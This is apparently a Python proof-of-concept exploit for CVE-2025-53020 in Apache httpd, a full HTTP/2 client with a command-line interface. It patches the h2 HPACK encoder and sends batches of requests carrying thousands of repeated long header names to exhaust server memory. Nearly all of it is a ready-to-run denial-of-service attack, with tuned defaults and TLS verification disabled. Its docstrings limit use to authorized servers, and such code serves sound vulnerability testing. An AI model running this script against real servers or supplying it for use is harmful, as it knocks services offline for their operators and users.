# README.md
# Rendering markdown...
import h2.connection
import socket
import time
import tqdm
import argparse
import ssl
from urllib.parse import urlparse
import struct
class H2Attacker:
    """HTTP/2 client for testing memory exhaustion vulnerabilities in Apache httpd.

    Only use this against servers you own or are explicitly authorized to test.

    An instance holds one socket (TLS-wrapped when the URL scheme is
    ``https``) and one ``h2`` connection object. Call :meth:`connect` before
    sending anything and :meth:`close` when done; the instance also works as
    a context manager, which calls :meth:`close` on exit (it does not call
    :meth:`connect` for you).
    """

    def __init__(self, url):
        """Initialize the attacker with target URL.

        Args:
            url (str): Target URL (e.g., 'https://example.com/path')

        Raises:
            ValueError: If no host can be parsed from ``url``.
        """
        parsed_url = urlparse(url)
        self.protocol = parsed_url.scheme
        self.host = parsed_url.hostname
        # Fall back to the scheme's conventional port when none is given.
        self.port = parsed_url.port or (443 if self.protocol == 'https' else 80)
        self.path = parsed_url.path or '/'

        # Validate required components
        if not self.host:
            raise ValueError(f"Invalid URL: {url}. Host is required.")

        # Connection objects; populated by connect(), cleared by close()
        self.socket = None
        self.http2_connection = None

        # Create pseudo headers from URL components
        self.pseudo_headers = self._create_pseudo_headers()
        # Copy so later changes to one list do not affect the other.
        self.default_headers = self.pseudo_headers.copy()

    def __enter__(self):
        """Return the instance itself; the caller still has to call connect()."""
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        """Close the connection when leaving a ``with`` block."""
        self.close()
        # Returning None lets any in-flight exception propagate.

    def _create_pseudo_headers(self):
        """Create HTTP/2 pseudo headers from URL components.

        Returns:
            list: List of pseudo header tuples
        """
        return [
            (':method', 'GET'),
            (':path', self.path),
            (':authority', self.host),
            (':scheme', self.protocol),
        ]

    def connect(self):
        """Establish HTTP/2 connection to the target server.

        Opens the TCP socket, wraps it in TLS for ``https`` URLs, sends the
        data produced by ``initiate_connection()`` and installs the encoder
        patch.

        Raises:
            ConnectionError: If any step fails. The original exception is
                chained as ``__cause__`` and the socket opened so far is
                closed before raising.
        """
        try:
            # Create socket connection
            self.socket = socket.create_connection((self.host, self.port))
            # Set SO_LINGER to 5 seconds to ensure graceful shutdown with FIN
            self.socket.setsockopt(
                socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 5)
            )

            # Setup TLS if HTTPS
            if self.protocol == 'https':
                self._setup_tls()

            # Initialize HTTP/2 connection
            self.http2_connection = h2.connection.H2Connection()
            self.http2_connection.initiate_connection()
            self.socket.sendall(self.http2_connection.data_to_send())

            # Apply the encoder patch for empty values
            self._patch_encoder_for_empty_values()
        except Exception as e:
            # Do not leak a half-open socket when a later step fails.
            self.close()
            raise ConnectionError(
                f"Failed to connect to {self.host}:{self.port}: {e}"
            ) from e

    def close(self):
        """Close the socket and drop the HTTP/2 state.

        Safe to call more than once and before :meth:`connect`.
        """
        sock, self.socket = self.socket, None
        self.http2_connection = None
        if sock is None:
            return
        try:
            sock.close()
        except OSError:
            # Best effort: the peer may already have torn the connection down.
            pass

    def _setup_tls(self):
        """Setup TLS connection with HTTP/2 ALPN.

        Certificate and hostname verification are disabled on the context.
        """
        context = ssl.create_default_context()
        # check_hostname must be turned off before verify_mode can be CERT_NONE.
        context.check_hostname = False
        context.verify_mode = ssl.CERT_NONE

        # Set ALPN to negotiate HTTP/2
        context.set_alpn_protocols(['h2'])

        # Wrap socket with TLS
        self.socket = context.wrap_socket(self.socket, server_hostname=self.host)

        # Ensure SSL handshake completes
        self.socket.do_handshake()

    def _patch_encoder_for_empty_values(self):
        """Patch the h2 encoder to fix empty value indexing bug.

        Replaces ``encoder.add`` on the current connection with a wrapper
        that treats a header-table hit as a perfect match whenever the
        returned value is not ``None``, so an empty value also counts as a
        perfect match.

        Raises:
            RuntimeError: If no HTTP/2 connection object exists yet.
        """
        if not self.http2_connection:
            raise RuntimeError("HTTP/2 connection not established")

        # Bind the encoder being patched so the wrapper always refers to it.
        encoder = self.http2_connection.encoder
        original_add = encoder.add

        def patched_add(to_add, sensitive, huffman=False):
            name, value = to_add

            # Set indexing mode
            indexbit = b'\x40' if not sensitive else b'\x10'  # INDEX_INCREMENTAL or INDEX_NEVER

            # Search for matching header
            match = encoder.header_table.search(name, value)
            if match is None:
                # Not in table - use original logic
                return original_add(to_add, sensitive, huffman)

            # Header is in table
            index, _found_name, found_value = match

            # Fix: Check if found_value is not None (perfect match) instead of truthy
            if found_value is not None:
                # Perfect match - use indexed encoding
                return encoder._encode_indexed(index)

            # Name-only match - use indexed literal
            encoded = encoder._encode_indexed_literal(index, value, indexbit, huffman)
            if not sensitive:
                encoder.header_table.add(name, value)
            return encoded

        # Replace the add method
        encoder.add = patched_add

    def set_default_headers(self, additional_headers):
        """Set default headers by combining pseudo headers with additional headers.

        Args:
            additional_headers (list): List of additional header tuples
        """
        # list() accepts any iterable of tuples and avoids aliasing the argument.
        self.default_headers = self.pseudo_headers + list(additional_headers)

    def send_headers(self, headers, add_pseudo_headers=True):
        """Send HTTP/2 headers for a single request.

        The stream is opened with ``end_stream=True`` and the resulting bytes
        are written to the socket immediately.

        Args:
            headers (list): List of header tuples
            add_pseudo_headers (bool): Whether to prepend pseudo headers

        Raises:
            RuntimeError: If no HTTP/2 connection object exists yet.
        """
        if not self.http2_connection:
            raise RuntimeError("HTTP/2 connection not established")

        if add_pseudo_headers:
            headers = self.pseudo_headers + list(headers)

        stream_id = self.http2_connection.get_next_available_stream_id()
        self.http2_connection.send_headers(stream_id, headers, end_stream=True)
        self.socket.sendall(self.http2_connection.data_to_send())

    def send_default_headers(self):
        """Send a request using the default headers.

        Raises:
            ValueError: If the default header list is empty.
        """
        if not self.default_headers:
            raise ValueError("Default headers are not set")
        # default_headers already starts with the pseudo headers.
        self.send_headers(self.default_headers, add_pseudo_headers=False)

    def add_headers_to_batch(self, headers):
        """Add headers to batch without sending immediately.

        The frames are only queued in the ``h2`` connection object (with
        ``end_stream=False``); :meth:`send_batch` writes them to the socket.

        Args:
            headers (list): List of header tuples

        Raises:
            RuntimeError: If no HTTP/2 connection object exists yet.
        """
        if not self.http2_connection:
            raise RuntimeError("HTTP/2 connection not established")

        stream_id = self.http2_connection.get_next_available_stream_id()
        self.http2_connection.send_headers(stream_id, headers, end_stream=False)

    def send_batch(self):
        """Send all batched headers.

        Raises:
            RuntimeError: If no HTTP/2 connection object exists yet.
        """
        if not self.http2_connection:
            raise RuntimeError("HTTP/2 connection not established")

        self.socket.sendall(self.http2_connection.data_to_send())

    @staticmethod
    def create_repeated_header_name_headers(header_name_length=4000, header_reps=1000, char_to_repeat='a'):
        """Create headers with repeated long header names.

        Args:
            header_name_length (int): Length of the header name
            header_reps (int): Number of times to repeat the header
            char_to_repeat (str): Character to use for the header name

        Returns:
            list: List of header tuples with repeated long names; every
                tuple has the same name and an empty value.
        """
        header_name = char_to_repeat * header_name_length
        return [(header_name, '')] * header_reps

    def run_attack_with_headers(self, headers, requests_per_batch, num_batches, delay_between_batches=0):
        """Run the memory exhaustion attack with specified headers.

        Args:
            headers (list): Headers to use for the attack
            requests_per_batch (int): Number of requests to send per batch
            num_batches (int): Number of batches to send
            delay_between_batches (float): Delay in seconds between batches
        """
        print(f"Starting attack: {num_batches} batches of {requests_per_batch} requests each")

        for _batch in tqdm.tqdm(range(num_batches), desc="Sending batches"):
            # Queue the whole batch first, then flush it in one write.
            for _request in range(requests_per_batch):
                self.add_headers_to_batch(headers)
            self.send_batch()

            if delay_between_batches > 0:
                time.sleep(delay_between_batches)

    def run_attack_with_default_headers(self, requests_per_batch, num_batches, delay_between_batches=0):
        """Run attack using the default headers.

        Args:
            requests_per_batch (int): Number of requests to send per batch
            num_batches (int): Number of batches to send
            delay_between_batches (float): Delay in seconds between batches
        """
        self.run_attack_with_headers(
            self.default_headers, requests_per_batch, num_batches, delay_between_batches
        )
def run_memory_exhaustion_attack(url, header_name_length, header_reps, requests_per_batch,
                                 num_batches, delay_between_batches=0, num_headers_to_repeat=1):
    """Run the memory exhaustion attack against Apache httpd.

    Only use this against servers you own or are explicitly authorized to test.

    Connects to ``url``, sends one initial request, then sends the configured
    batches and waits five seconds. The socket is closed before returning,
    whether the run succeeds or raises.

    Args:
        url (str): Target URL
        header_name_length (int): Length of repeated header names
        header_reps (int): Number of header repetitions per request
        requests_per_batch (int): Number of requests per batch
        num_batches (int): Number of batches to send
        delay_between_batches (float): Delay between batches in seconds
        num_headers_to_repeat (int): Number of different header names to create using different characters
    """
    print(f"Targeting: {url}")
    print(f"Header name length: {header_name_length}")
    print(f"Header repetitions: {header_reps}")
    print(f"Number of different header names: {num_headers_to_repeat}")

    # Initialize attacker
    attacker = H2Attacker(url)
    try:
        attacker.connect()

        # First, send an initial request to add the header to HPACK table
        print("Sending initial request to populate HPACK table...")
        initial_headers = H2Attacker.create_repeated_header_name_headers(
            header_name_length=header_name_length, header_reps=1
        )
        attacker.send_headers(initial_headers)

        # Prepare attack headers with different character patterns
        print("Preparing attack headers...")
        attack_headers = []
        for i in range(num_headers_to_repeat):
            # Successive characters starting at 'a' give distinct header names.
            char = chr(ord('a') + i)
            attack_headers.extend(
                H2Attacker.create_repeated_header_name_headers(
                    header_name_length=header_name_length,
                    header_reps=header_reps,
                    char_to_repeat=char,
                )
            )

        # Set as default headers and run attack
        attacker.set_default_headers(attack_headers)
        attacker.run_attack_with_default_headers(
            requests_per_batch=requests_per_batch,
            num_batches=num_batches,
            delay_between_batches=delay_between_batches,
        )

        print("Attack completed. Waiting for server response...")
        time.sleep(5)
    finally:
        # Always release the socket, including when connect() or a send fails.
        sock = attacker.socket
        if sock is not None:
            attacker.socket = None
            sock.close()
def main():
    """Parse command-line arguments, validate them and run the PoC.

    Warnings and errors are written to stderr.

    Returns:
        int: 0 on success, 1 when an argument is rejected or the run raises.
    """
    # Local import: the module-level import block does not provide sys.
    import sys

    parser = argparse.ArgumentParser(
        description='''HTTP/2 Memory Exhaustion PoC for Apache httpd
This tool exploits CVE-2025-53020 in Apache httpd by sending HTTP/2 requests with repetitive long header names,
which takes advantage of unnecessary memory duplication for header names.
The attack works by:
1. Creating long header names (--header-name-length) to maximize memory consumption
2. Optionally creating multiple distinct header names (--num-headers-to-repeat) using different characters (a, b, c, etc.)
3. Sending batches of requests (--batches) where:
- Each request contains multiple repetitions of the header names (--header-reps)
- Multiple requests can be sent per batch (--requests-per-batch)
- Optional delays between batches can be configured (--delay)
4. The server allocates memory for each header name occurrence, leading to memory exhaustion
Example usage:
python poc.py --url https://target.com/api/endpoint
python poc.py --url http://localhost:8080/test --header-reps 1000
python poc.py --url https://target.com --num-headers-to-repeat 3
''',
        formatter_class=argparse.RawDescriptionHelpFormatter
    )
    parser.add_argument('--url', required=True,
                        help='Target URL (e.g., https://example.com/path)')
    parser.add_argument('--header-name-length', type=int, default=4064,
                        help='Length of header name (default: 4064)')
    parser.add_argument('--header-reps', type=int, default=2063,
                        help='Number of header repetitions per request (default: 2063)')
    parser.add_argument('--requests-per-batch', type=int, default=1,
                        help='Number of requests per batch (default: 1)')
    parser.add_argument('--batches', type=int, default=100,
                        help='Number of batches (default: 100)')
    parser.add_argument('--delay', type=float, default=0,
                        help='Delay between batches in seconds (default: 0)')
    parser.add_argument('--num-headers-to-repeat', type=int, default=1,
                        help='Number of different header names to create (default: 1)')
    args = parser.parse_args()

    # Reject counts that cannot describe a meaningful run.
    positive_options = (
        ('--header-name-length', args.header_name_length),
        ('--header-reps', args.header_reps),
        ('--requests-per-batch', args.requests_per_batch),
        ('--batches', args.batches),
        ('--num-headers-to-repeat', args.num_headers_to_repeat),
    )
    for option, value in positive_options:
        if value < 1:
            print(f"ERROR: {option} must be at least 1 (got {value})", file=sys.stderr)
            return 1
    if args.delay < 0:
        print(f"ERROR: --delay must not be negative (got {args.delay})", file=sys.stderr)
        return 1

    # With multiple header names, one request per batch is recommended (only
    # warned about, not enforced) and the name length limit is lower.
    if args.num_headers_to_repeat != 1:
        if args.requests_per_batch != 1:
            print("Warning: When using multiple header names > 1, "
                  "requests per batch is recommended to be 1", file=sys.stderr)
        if args.header_name_length > 4000:
            print("ERROR: When using multiple header names > 1, "
                  "header name length should be at most 4000", file=sys.stderr)
            return 1

    if args.header_name_length > 4064:
        print("ERROR: Header name length should be at most 4064", file=sys.stderr)
        return 1

    if args.header_reps > 2063:
        print("Warning: Header reps should be at most 2063", file=sys.stderr)

    try:
        run_memory_exhaustion_attack(
            url=args.url,
            header_name_length=args.header_name_length,
            header_reps=args.header_reps,
            requests_per_batch=args.requests_per_batch,
            num_batches=args.batches,
            delay_between_batches=args.delay,
            num_headers_to_repeat=args.num_headers_to_repeat
        )
    except Exception as e:
        # Top-level boundary: report the failure and signal it via exit status.
        print(f"Error: {e}", file=sys.stderr)
        return 1
    return 0
# Script entry point: propagate main()'s return value as the process exit
# status. SystemExit is raised directly because the bare `exit` helper is
# injected by the `site` module and is not guaranteed to be available.
if __name__ == "__main__":
    raise SystemExit(main())